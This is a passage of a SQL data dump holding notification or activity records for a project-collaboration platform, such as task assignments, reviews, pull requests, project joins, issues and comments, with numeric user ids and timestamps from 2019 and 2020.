08:51:15','Comment','1'),(793,1,49,69,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-13 08:54:09','2019-11-13 08:54:09','Project','2'),(794,1,49,69,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-13 09:07:34','2019-11-13 09:07:34','Task','21'),(795,65,1,69,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-13 09:08:27','2019-11-13 09:08:27','System','11'),(796,1,49,90,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-13 09:08:27','2019-11-13 09:08:27','Review','16'),(797,49,1,90,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-13 09:09:28','2019-11-13 09:09:28','System','17'),(798,1,49,91,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-13 09:15:26','2019-11-13 09:15:26','Review','18'),(799,49,59,237,'JoinProject',NULL,NULL,237,'Project',1,NULL,'2019-11-13 14:37:13','2019-11-13 14:37:13','Apply','4'),(800,59,49,237,'DealProject',NULL,NULL,237,'Project',1,NULL,'2019-11-13 14:37:22','2019-11-13 14:37:22','System','4'),(801,49,59,33,'PullRequest',237,'Project',237,'Project',0,0,'2019-11-13 14:41:24','2019-11-13 14:41:24','Apply',NULL),(802,49,64,237,'JoinProject',NULL,NULL,237,'Project',1,NULL,'2019-11-13 14:47:04','2019-11-13 14:47:04','Apply','4'),(803,64,49,237,'DealProject',NULL,NULL,237,'Project',1,NULL,'2019-11-13 14:47:12','2019-11-13 14:47:12','System','4'),(804,49,46,34,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-14 17:09:07','2019-11-14 17:09:07','Apply',NULL),(805,48,46,34,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-14 17:09:07','2019-11-14 17:09:07','Apply',NULL),(806,46,49,34,'PullRequest',199,'Project',199,'Project',4,0,'2019-11-14 17:13:15','2019-11-14 17:13:15','Project',NULL),(807,46,49,34,'PullRequest',NULL,'Project',199,'Project',3,0,'2019-11-14 17:13:50','2019-11-14 17:13:50','Project',NULL),(808,46,49,34,'PullRequest',NULL,'Project',199,'Project',4,0,'2019-11-14 17:14:01','2019-11-14 17:14:01','Project',NULL),(809,46,49,34,'PullRequest',NULL,'Project',199,'Project',3,0,'2019-11-14 17:14:18','2019-11-14 17:14:18','Project',NULL),(810,46,49,34,'PullRequest',NULL,'Project',199,'Project',4,0,'2019-11-14 17:14:24','2019-11-14 17:14:24','Project',NULL),(814,49,46,35,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-18 11:05:07','2019-11-18 11:05:07','Apply',NULL),(815,48,46,35,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-18 11:05:07','2019-11-18 11:05:07','Apply',NULL),(816,46,49,35,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-18 11:10:29','2019-11-18 11:10:29','Project',NULL),(817,49,49,36,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-18 11:10:36','2019-11-18 11:10:36','Apply',NULL),(818,48,49,36,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-18 11:10:36','2019-11-18 11:10:36','Apply',NULL),(819,49,1,70,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-18 11:11:24','2019-11-18 11:11:24','Task','5'),(820,50,1,47,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-20 11:17:29','2019-11-20 11:17:29','System','8'),(824,49,1,71,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:00:57','2019-11-20 17:00:57','Task','5'),(825,49,1,72,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:01:06','2019-11-20 17:01:06','Task','5'),(826,49,1,73,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:01:14','2019-11-20 17:01:14','Task','5'),(827,49,1,74,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:01:20','2019-11-20 17:01:20','Task','5'),(828,49,1,75,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:01:27','2019-11-20 17:01:27','Task','5'),(829,49,1,76,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:01:38','2019-11-20 17:01:38','Task','5'),(830,49,1,77,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:02:27','2019-11-20 17:02:27','Task','5'),(831,49,1,78,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:02:34','2019-11-20 17:02:34','Task','5'),(832,49,1,79,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:02:41','2019-11-20 17:02:41','Task','5'),(833,49,1,80,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:02:54','2019-11-20 17:02:54','Task','5'),(834,49,1,81,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 17:03:02','2019-11-20 17:03:02','Task','5'),(844,46,64,239,'JoinProject',NULL,NULL,239,'Project',1,NULL,'2019-11-20 18:36:34','2019-11-20 18:36:34','Apply','4'),(845,64,46,239,'DealProject',NULL,NULL,239,'Project',2,NULL,'2019-11-20 18:41:20','2019-11-20 18:41:20','System','4'),(846,46,64,239,'JoinProject',NULL,NULL,239,'Project',1,NULL,'2019-11-20 18:47:23','2019-11-20 18:47:23','Apply','4'),(847,64,46,239,'DealProject',NULL,NULL,239,'Project',1,NULL,'2019-11-20 18:47:53','2019-11-20 18:47:53','System','4'),(848,49,1,82,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 19:17:03','2019-11-20 19:17:03','Task','5'),(849,49,1,83,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 19:39:33','2019-11-20 19:39:33','Task','5'),(850,49,1,84,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 19:39:54','2019-11-20 19:39:54','Task','5'),(851,49,1,85,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-20 19:50:11','2019-11-20 19:50:11','Task','5'),(852,1,59,114,'Paper',NULL,NULL,82,'Task',1,0,'2019-11-20 20:23:47','2019-11-20 20:23:47','Comment','1'),(853,1,63,117,'Paper',NULL,NULL,81,'Task',1,0,'2019-11-21 08:12:46','2019-11-21 08:12:46','Comment','1'),(854,49,1,86,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 10:25:50','2019-11-21 10:25:50','Task','6'),(855,49,1,87,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 10:26:20','2019-11-21 10:26:20','Task','6'),(856,49,1,88,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 10:37:04','2019-11-21 10:37:04','Task','5'),(859,1,63,118,'Paper',NULL,NULL,75,'Task',1,0,'2019-11-21 11:10:58','2019-11-21 11:10:58','Comment','1'),(862,1,63,119,'Paper',NULL,NULL,74,'Task',1,0,'2019-11-21 12:24:05','2019-11-21 12:24:05','Comment','1'),(863,1,50,120,'Paper',NULL,NULL,74,'Task',1,0,'2019-11-21 12:24:40','2019-11-21 12:24:40','Comment','1'),(864,1,49,85,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 14:38:38','2019-11-21 14:38:38','Project','2'),(865,1,49,74,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 14:39:05','2019-11-21 14:39:05','Project','2'),(866,49,1,89,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 14:51:00','2019-11-21 14:51:00','Task','6'),(867,1,63,121,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 15:03:02','2019-11-21 15:03:02','Comment','1'),(868,1,50,122,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 15:03:16','2019-11-21 15:03:16','Comment','1'),(869,1,49,76,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-11-21 15:04:25','2019-11-21 15:04:25','Project','2'),(870,1,63,123,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 15:58:52','2019-11-21 15:58:52','Comment','1'),(871,1,63,124,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 16:01:08','2019-11-21 16:01:08','Comment','1'),(872,1,50,125,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 16:01:46','2019-11-21 16:01:46','Comment','1'),(873,1,63,126,'Paper',NULL,NULL,76,'Task',1,0,'2019-11-21 16:05:01','2019-11-21 16:05:01','Comment','1'),(874,1,49,74,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:18:26','2019-11-21 17:18:26','Task','21'),(875,1,49,85,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:19:28','2019-11-21 17:19:28','Task','21'),(876,49,1,74,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:36:18','2019-11-21 17:36:18','System','11'),(877,63,1,74,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:36:18','2019-11-21 17:36:18','System','11'),(878,63,1,85,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:50:54','2019-11-21 17:50:54','System','11'),(879,59,1,85,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 17:50:54','2019-11-21 17:50:54','System','11'),(882,49,1,85,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-21 18:21:26','2019-11-21 18:21:26','System','10'),(883,63,1,115,'Paper',NULL,NULL,85,'Task',1,0,'2019-11-21 18:21:26','2019-11-21 18:21:26','System','12'),(884,59,1,116,'Paper',NULL,NULL,85,'Task',1,0,'2019-11-21 18:21:26','2019-11-21 18:21:26','System','12'),(887,50,1,78,'Review',NULL,NULL,NULL,NULL,1,0,'2019-11-22 08:52:17','2019-11-22 08:52:17','System','2'),(897,64,46,115,'PraiseTread',100,'Issue',NULL,NULL,NULL,0,'2019-11-22 09:23:26','2019-11-22 09:23:26','Praise',NULL),(898,49,46,116,'PraiseTread',126,'Journal',NULL,NULL,NULL,0,'2019-11-22 09:23:29','2019-11-22 09:23:29','Praise',NULL),(899,64,46,131,'Journal',100,'Issue',199,'Project',NULL,0,'2019-11-22 09:24:00','2019-11-22 09:24:00','Comment',NULL),(900,66,46,132,'Journal',99,'Issue',199,'Project',NULL,0,'2019-11-22 09:44:13','2019-11-22 09:44:13','Project',NULL),(901,64,46,133,'Journal',101,'Issue',199,'Project',NULL,0,'2019-11-22 09:52:22','2019-11-22 09:52:22','Project',NULL),(902,64,46,134,'Journal',101,'Issue',199,'Project',NULL,0,'2019-11-22 09:56:37','2019-11-22 09:56:37','Project',NULL),(903,64,46,135,'Journal',100,'Issue',199,'Project',NULL,0,'2019-11-22 10:01:49','2019-11-22 10:01:49','Project',NULL),(907,46,46,119,'PraiseTread',131,'Journal',NULL,NULL,NULL,0,'2019-11-22 10:47:58','2019-11-22 10:47:58','Praise',NULL),(913,49,46,37,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-22 12:46:03','2019-11-22 12:46:03','Apply',NULL),(914,48,46,37,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-22 12:46:03','2019-11-22 12:46:03','Apply',NULL),(915,46,46,37,'PullRequest',199,'Project',199,'Project',4,0,'2019-11-22 12:48:55','2019-11-22 12:48:55','Project',NULL),(916,49,46,38,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-22 12:50:14','2019-11-22 12:50:14','Apply',NULL),(917,48,46,38,'PullRequest',199,'Project',199,'Project',0,0,'2019-11-22 12:50:14','2019-11-22 12:50:14','Apply',NULL),(918,49,46,39,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-22 14:40:58','2019-11-22 14:40:58','Apply',NULL),(919,48,46,39,'PullRequest',199,'Project',199,'Project',1,0,'2019-11-22 14:40:58','2019-11-22 14:40:58','Apply',NULL),(920,46,49,39,'PullRequest',199,'Project',199,'Project',2,0,'2019-11-22 15:05:35','2019-11-22 15:05:35','Project',NULL),(921,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:04:41','2019-11-24 15:04:41','System','5'),(922,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:08:19','2019-11-24 15:08:19','System','5'),(923,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:08:24','2019-11-24 15:08:24','System','5'),(924,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:12:12','2019-11-24 15:12:12','System','5'),(925,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:12:32','2019-11-24 15:12:32','System','5'),(926,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:14:01','2019-11-24 15:14:01','System','4'),(927,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:16:40','2019-11-24 15:16:40','System','4'),(928,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:22:06','2019-11-24 15:22:06','System','5'),(929,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:22:14','2019-11-24 15:22:14','System','5'),(930,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:22:22','2019-11-24 15:22:22','System','5'),(931,NULL,49,199,'ManagerJoinProject',NULL,NULL,199,'Project',NULL,NULL,'2019-11-24 15:22:34','2019-11-24 15:22:34','System','5'),(932,55,1,24,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-24 19:09:23','2019-11-24 19:09:23','System','8'),(933,49,1,25,'Task',NULL,NULL,NULL,NULL,1,0,'2019-11-24 19:10:51','2019-11-24 19:10:51','System','9'),(939,49,1,90,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-03 15:11:52','2019-12-03 15:11:52','Task','5'),(940,49,1,91,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-30 09:16:22','2019-12-30 09:16:22','Task','5'),(941,49,1,92,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-30 09:18:04','2019-12-30 09:18:04','Task','5'),(942,49,1,93,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-30 09:56:54','2019-12-30 09:56:54','Task','5'),(943,49,1,94,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-30 10:01:12','2019-12-30 10:01:12','Task','6'),(944,1,64,127,'Paper',NULL,NULL,94,'Task',1,0,'2019-12-30 10:07:20','2019-12-30 10:07:20','Comment','1'),(945,1,64,128,'Paper',NULL,NULL,92,'Task',1,0,'2019-12-30 10:16:20','2019-12-30 10:16:20','Comment','1'),(946,49,49,40,'PullRequest',199,'Project',199,'Project',1,0,'2019-12-30 14:58:32','2019-12-30 14:58:32','Apply',NULL),(947,48,49,40,'PullRequest',199,'Project',199,'Project',1,0,'2019-12-30 14:58:32','2019-12-30 14:58:32','Apply',NULL),(948,49,49,40,'PullRequest',199,'Project',199,'Project',2,0,'2019-12-30 14:58:52','2019-12-30 14:58:52','Project',NULL),(949,1,66,129,'Paper',NULL,NULL,92,'Task',1,0,'2019-12-30 15:01:49','2019-12-30 15:01:49','Comment','1'),(950,1,46,130,'Paper',NULL,NULL,92,'Task',1,0,'2019-12-30 15:09:41','2019-12-30 15:09:41','Comment','1'),(951,1,49,92,'Task',NULL,NULL,NULL,NULL,0,NULL,'2019-12-30 15:40:59','2019-12-30 15:40:59','Project','2'),(953,1,1,251,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-01 19:03:09','2020-02-01 19:03:09','Project','1'),(954,NULL,75,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-01 20:36:43','2020-02-01 20:36:43','System','3'),(955,76,75,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-01 20:36:53','2020-02-01 20:36:53','System','3'),(956,1,1,252,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-01 21:17:31','2020-02-01 21:17:31','Project','1'),(957,76,75,252,'ManagerJoinProject',NULL,NULL,252,'Project',NULL,NULL,'2020-02-01 21:18:26','2020-02-01 21:18:26','System','4'),(958,75,76,29,'Watcher',NULL,NULL,75,'User',NULL,0,'2020-02-01 22:36:19','2020-02-01 22:36:19','Fan',NULL),(964,1,1,254,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-02 23:36:38','2020-02-02 23:36:38','Project','1'),(965,1,1,255,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-03 12:08:29','2020-02-03 12:08:29','Project','1'),(966,77,1,109,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 12:10:02','2020-02-03 12:10:02','System','2'),(967,77,1,110,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 12:18:26','2020-02-03 12:18:26','System','2'),(968,75,1,107,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 12:18:30','2020-02-03 12:18:30','System','2'),(969,75,1,108,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 12:18:32','2020-02-03 12:18:32','System','2'),(970,1,1,256,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-03 16:57:11','2020-02-03 16:57:11','Project','1'),(971,55,1,111,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 17:00:03','2020-02-03 17:00:03','System','2'),(972,1,1,257,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-03 17:36:28','2020-02-03 17:36:28','Project','1'),(973,78,1,112,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 17:38:22','2020-02-03 17:38:22','System','2'),(974,NULL,1,256,'ManagerJoinProject',NULL,NULL,256,'Project',NULL,NULL,'2020-02-03 17:44:35','2020-02-03 17:44:35','System','5'),(975,NULL,1,256,'ManagerJoinProject',NULL,NULL,256,'Project',NULL,NULL,'2020-02-03 17:44:45','2020-02-03 17:44:45','System','4'),(976,78,1,256,'ManagerJoinProject',NULL,NULL,256,'Project',NULL,NULL,'2020-02-03 17:44:53','2020-02-03 17:44:53','System','4'),(977,1,1,258,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-03 17:45:42','2020-02-03 17:45:42','Project','1'),(978,48,1,113,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-03 17:46:45','2020-02-03 17:46:45','System','2'),(979,1,1,259,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-03 19:30:28','2020-02-03 19:30:28','Project','1'),(982,75,76,111,'Issue',NULL,NULL,251,'Project',NULL,0,'2020-02-04 22:00:33','2020-02-04 22:00:33','Project',NULL),(983,NULL,76,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-04 22:05:33','2020-02-04 22:05:33','System','4'),(984,79,76,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-04 22:06:21','2020-02-04 22:06:21','System','4'),(985,NULL,76,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-04 22:11:28','2020-02-04 22:11:28','System','5'),(986,80,76,251,'ManagerJoinProject',NULL,NULL,251,'Project',NULL,NULL,'2020-02-04 22:15:09','2020-02-04 22:15:09','System','5'),(987,75,79,33,'Watcher',NULL,NULL,75,'User',NULL,0,'2020-02-04 22:26:14','2020-02-04 22:26:14','Fan',NULL),(988,79,76,34,'Watcher',NULL,NULL,79,'User',NULL,0,'2020-02-04 22:48:24','2020-02-04 22:48:24','Fan',NULL),(989,80,79,35,'Watcher',NULL,NULL,80,'User',NULL,0,'2020-02-04 22:51:34','2020-02-04 22:51:34','Fan',NULL),(990,76,79,36,'Watcher',NULL,NULL,76,'User',NULL,0,'2020-02-04 22:57:04','2020-02-04 22:57:04','Fan',NULL),(991,76,77,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-05 11:17:13','2020-02-05 11:17:13','System','3'),(992,82,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:14:29','2020-02-10 10:14:29','System','4'),(993,86,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:14:42','2020-02-10 10:14:42','System','4'),(994,85,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:14:57','2020-02-10 10:14:57','System','4'),(995,87,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:15:07','2020-02-10 10:15:07','System','4'),(996,81,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:15:35','2020-02-10 10:15:35','System','4'),(997,NULL,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:15:48','2020-02-10 10:15:48','System','4'),(998,NULL,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:01','2020-02-10 10:16:01','System','4'),(999,88,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:14','2020-02-10 10:16:14','System','4'),(1000,90,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:23','2020-02-10 10:16:23','System','5'),(1001,91,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:40','2020-02-10 10:16:40','System','4'),(1002,95,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:47','2020-02-10 10:16:47','System','4'),(1003,96,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:16:56','2020-02-10 10:16:56','System','4'),(1004,97,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:17:38','2020-02-10 10:17:38','System','4'),(1005,98,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:17:47','2020-02-10 10:17:47','System','4'),(1006,99,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:17:55','2020-02-10 10:17:55','System','4'),(1007,75,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:18:04','2020-02-10 10:18:04','System','4'),(1008,84,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:11','2020-02-10 10:20:11','System','4'),(1009,89,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:19','2020-02-10 10:20:19','System','4'),(1010,93,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:29','2020-02-10 10:20:29','System','4'),(1011,80,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:38','2020-02-10 10:20:38','System','4'),(1012,94,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:47','2020-02-10 10:20:47','System','4'),(1013,100,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:20:56','2020-02-10 10:20:56','System','4'),(1014,102,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:21:03','2020-02-10 10:21:03','System','4'),(1015,92,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:22:04','2020-02-10 10:22:04','System','4'),(1016,83,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-10 10:26:53','2020-02-10 10:26:53','System','4'),(1017,1,1,266,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-11 09:30:09','2020-02-11 09:30:09','Project','1'),(1018,103,1,116,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-11 09:50:25','2020-02-11 09:50:25','System','2'),(1019,89,81,112,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 09:54:10','2020-02-11 09:54:10','Project',NULL),(1020,91,81,113,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:04:09','2020-02-11 10:04:09','Project',NULL),(1021,98,81,114,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:05:52','2020-02-11 10:05:52','Project',NULL),(1022,1,1,270,'Project',NULL,NULL,NULL,NULL,0,0,'2020-02-11 10:06:32','2020-02-11 10:06:32','Project','1'),(1023,47,1,114,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-11 10:06:32','2020-02-11 10:06:32','System','2'),(1024,47,1,117,'Review',NULL,NULL,NULL,NULL,1,0,'2020-02-11 10:07:01','2020-02-11 10:07:01','System','2'),(1025,80,81,115,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:07:24','2020-02-11 10:07:24','Project',NULL),(1026,86,81,116,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:10:24','2020-02-11 10:10:24','Project',NULL),(1027,92,81,117,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:11:35','2020-02-11 10:11:35','Project',NULL),(1028,95,81,118,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:12:28','2020-02-11 10:12:28','Project',NULL),(1029,87,81,119,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:14:14','2020-02-11 10:14:14','Project',NULL),(1030,95,81,121,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:19:27','2020-02-11 10:19:27','Project',NULL),(1031,91,81,123,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:22:01','2020-02-11 10:22:01','Project',NULL),(1032,91,81,124,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:22:04','2020-02-11 10:22:04','Project',NULL),(1033,89,81,125,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:22:56','2020-02-11 10:22:56','Project',NULL),(1034,86,81,126,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:23:32','2020-02-11 10:23:32','Project',NULL),(1035,87,81,127,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:24:14','2020-02-11 10:24:14','Project',NULL),(1036,92,81,128,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:24:55','2020-02-11 10:24:55','Project',NULL),(1037,80,81,129,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:25:44','2020-02-11 10:25:44','Project',NULL),(1038,77,81,130,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:26:30','2020-02-11 10:26:30','Project',NULL),(1039,98,81,131,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 10:27:27','2020-02-11 10:27:27','Project',NULL),(1040,81,86,139,'Journal',126,'Issue',255,'Project',NULL,0,'2020-02-11 10:42:16','2020-02-11 10:42:16','Comment',NULL),(1041,81,89,140,'Journal',112,'Issue',255,'Project',NULL,0,'2020-02-11 11:29:44','2020-02-11 11:29:44','Comment',NULL),(1042,81,89,141,'Journal',125,'Issue',255,'Project',NULL,0,'2020-02-11 11:31:22','2020-02-11 11:31:22','Comment',NULL),(1043,81,77,142,'Journal',114,'Issue',255,'Project',NULL,0,'2020-02-11 11:33:33','2020-02-11 11:33:33','Comment',NULL),(1044,77,99,37,'Watcher',NULL,NULL,77,'User',NULL,0,'2020-02-11 12:56:21','2020-02-11 12:56:21','Fan',NULL),(1046,100,99,132,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 16:39:25','2020-02-11 16:39:25','Project',NULL),(1047,102,99,133,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 16:40:27','2020-02-11 16:40:27','Project',NULL),(1048,101,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-11 16:43:58','2020-02-11 16:43:58','System','4'),(1049,101,76,255,'ManagerJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-02-11 16:43:58','2020-02-11 16:43:58','System','4'),(1050,101,99,134,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 16:45:53','2020-02-11 16:45:53','Project',NULL),(1051,86,99,135,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 17:02:48','2020-02-11 17:02:48','Project',NULL),(1053,77,82,38,'Watcher',NULL,NULL,77,'User',NULL,0,'2020-02-11 17:56:10','2020-02-11 17:56:10','Fan',NULL),(1054,97,83,136,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 19:52:24','2020-02-11 19:52:24','Project',NULL),(1055,76,83,137,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 19:59:30','2020-02-11 19:59:30','Project',NULL),(1056,82,83,138,'Issue',NULL,NULL,255,'Project',NULL,0,'2020-02-11 20:04:38','2020-02-11 20:04:38','Project',NULL),(1057,81,98,144,'Journal',114,'Issue',255,'Project',NULL,0,'2020-02-11 21:01:22','2020-02-11 21:01:22','Comment',NULL),(1061,81,80,149,'Journal',129,'Issue',255,'Project',NULL,0,'2020-02-24 18:32:32','2020-02-24 18:32:32','Project',NULL),(1062,1,1,273,'Project',NULL,NULL,NULL,NULL,0,0,'2020-03-14 09:33:12','2020-03-14 09:33:12','Project','1'),(1063,51,1,118,'Review',NULL,NULL,NULL,NULL,1,0,'2020-03-18 16:32:32','2020-03-18 16:32:32','System','2'),(1064,77,104,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 14:01:17','2020-03-19 14:01:17','System',NULL),(1065,76,104,255,'ReporterJoinProject',NULL,NULL,255,'Project',NULL,NULL,'2020-03-19 14:01:17','2020-03-19 14:01:17','System',NULL),(1066,81,80,150,'Journal',115,'Issue',255,'Project',NULL,0,'2020-03-19 14:13:32','2020-03-19 